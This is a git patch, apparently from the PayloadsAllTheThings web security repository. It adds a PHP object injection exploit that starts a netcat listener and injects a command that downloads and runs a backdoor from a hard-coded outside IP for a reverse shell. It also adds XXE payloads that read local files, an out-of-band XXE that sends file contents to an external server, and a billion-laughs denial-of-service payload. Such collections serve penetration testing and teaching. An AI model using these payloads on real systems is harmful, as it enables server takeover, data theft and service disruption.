From c097f222f449376d0b9fe183dafd0f52c1a39f08 Mon Sep 17 00:00:00 2001
From: swisskyrepo <maxropelewski@gmail.com>
Date: Tue, 18 Oct 2016 14:06:10 +0700
Subject: [PATCH] XXE payloads

---
 .../PHP-Serialization-RCE-Exploit.php         | 32 +++++++++++++
 README.md                                     | 18 ++++++-
 XXE/Classic XXE B64 Encoded.xml               |  1 +
 XXE/Classic XXE.xml                           |  6 +++
 XXE/Deny Of Service - Billion Laugh Attack    |  8 ++++
 XXE/README.md                                 | 48 ++++++++++++++++---
 XXE/XXE OOB Attack (Yunusov, 2013).xml        |  9 ++++
 7 files changed, 114 insertions(+), 8 deletions(-)
 create mode 100755 PHP_Serialization/PHP-Serialization-RCE-Exploit.php
 create mode 100755 XXE/Classic XXE B64 Encoded.xml
 create mode 100755 XXE/Classic XXE.xml
 create mode 100755 XXE/Deny Of Service - Billion Laugh Attack
 create mode 100755 XXE/XXE OOB Attack (Yunusov, 2013).xml

diff --git a/PHP_Serialization/PHP-Serialization-RCE-Exploit.php b/PHP_Serialization/PHP-Serialization-RCE-Exploit.php
new file mode 100755
index 0000000..af0aae4
--- /dev/null
+++ b/PHP_Serialization/PHP-Serialization-RCE-Exploit.php
@@ -0,0 +1,32 @@
+<?php 
+/*
+PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
+
+A simple PoC to exploit PHP Object Injections flaws and gain remote shell access. 
+
+Shouts to @jstnkndy @yappare for the assist!
+
+NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
+*/
+
+print "==============================================================================\r\n";
+print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
+print "==============================================================================\r\n";
+print "[+] Generating serialized payload...[OK]\r\n";
+print "[+] Launching reverse listener...[OK]\r\n";
+system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
+
+class PHPObjectInjection
+{
+   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
+   public $inject = "system('wget http://92.222.81.2/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
+}
+
+$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
+$url = $url . urlencode(serialize(new PHPObjectInjection));
+print "[+] Sending exploit...[OK]\r\n";
+print "[+] Dropping down to interactive shell...[OK]\r\n";
+print "==============================================================================\r\n";
+$response = file_get_contents("$url");
+
+?>
diff --git a/README.md b/README.md
index 2e31ff9..094b93c 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,18 @@
-/!\ Work in Progress : 1%
-
 # PayloadsAllTheThings
 A list of every usefull payloads and bypass for Web Application Security
+
+TODO:
+* XSS
+* Upload
+* Traversal Directory
+* Tar
+* SSRF
+* PHP Serialization
+* CSV Injection
+
+To improve:
+* RCE
+* SQL injection
+* XXE
+
+# /!\ Work in Progress : 1%
diff --git a/XXE/Classic XXE B64 Encoded.xml b/XXE/Classic XXE B64 Encoded.xml
new file mode 100755
index 0000000..bc4f01d
--- /dev/null
+++ b/XXE/Classic XXE B64 Encoded.xml	
@@ -0,0 +1 @@
+<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
\ No newline at end of file
diff --git a/XXE/Classic XXE.xml b/XXE/Classic XXE.xml
new file mode 100755
index 0000000..02f0b27
--- /dev/null
+++ b/XXE/Classic XXE.xml	
@@ -0,0 +1,6 @@
+<?xml version="1.0"?>
+<!DOCTYPE data [
+<!ELEMENT data (#ANY)>
+<!ENTITY file SYSTEM "file:///sys/power/image_size">
+]>
+<data>&file;</data>
\ No newline at end of file
diff --git a/XXE/Deny Of Service - Billion Laugh Attack b/XXE/Deny Of Service - Billion Laugh Attack
new file mode 100755
index 0000000..e4f2199
--- /dev/null
+++ b/XXE/Deny Of Service - Billion Laugh Attack	
@@ -0,0 +1,8 @@
+<!DOCTYPE data [
+<!ENTITY a0 "dos" >
+<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
+<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
+<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
+<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
+]>
+<data>&a4;</data>
\ No newline at end of file
diff --git a/XXE/README.md b/XXE/README.md
index c707ab4..da29ba9 100644
--- a/XXE/README.md
+++ b/XXE/README.md
@@ -1,12 +1,48 @@
-# Title
-Lorem	
+# XML External Entity
+An XML External Entity attack is a type of attack against an application that parses XML input	
 
-## Vuln
+## Exploit
 
+Classic XXE
 ```
-Code
+<?xml version="1.0"?>
+<!DOCTYPE data [
+<!ELEMENT data (#ANY)>
+<!ENTITY file SYSTEM "file:///sys/power/image_size">
+]>
+<data>&file;</data>
 ```
 
+Classic XXE Base64 encoded
+```
+<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
+```
+
+Deny Of Service - Billion Laugh Attack
+```
+<!DOCTYPE data [
+<!ENTITY a0 "dos" >
+<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
+<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
+<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
+<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
+]>
+<data>&a4;</data>
+```
+
+
+XXE OOB Attack (Yunusov, 2013)
+```
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
+<data>&send;</data>
+
+File stored on http://publicServer.com/parameterEntity_oob.dtd
+<!ENTITY % file SYSTEM "file:///sys/power/image_size">
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
+%all;
+```
+
+
 ## Thanks to
-* Lorem
-* Ipsum
\ No newline at end of file
+* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
\ No newline at end of file
diff --git a/XXE/XXE OOB Attack (Yunusov, 2013).xml b/XXE/XXE OOB Attack (Yunusov, 2013).xml
new file mode 100755
index 0000000..d36bca6
--- /dev/null
+++ b/XXE/XXE OOB Attack (Yunusov, 2013).xml	
@@ -0,0 +1,9 @@
+XXE OOB Attack (Yunusov, 2013)
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
+<data>&send;</data>
+
+File stored on http://publicServer.com/parameterEntity_oob.dtd
+<!ENTITY % file SYSTEM "file:///sys/power/image_size">
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
+%all;
\ No newline at end of file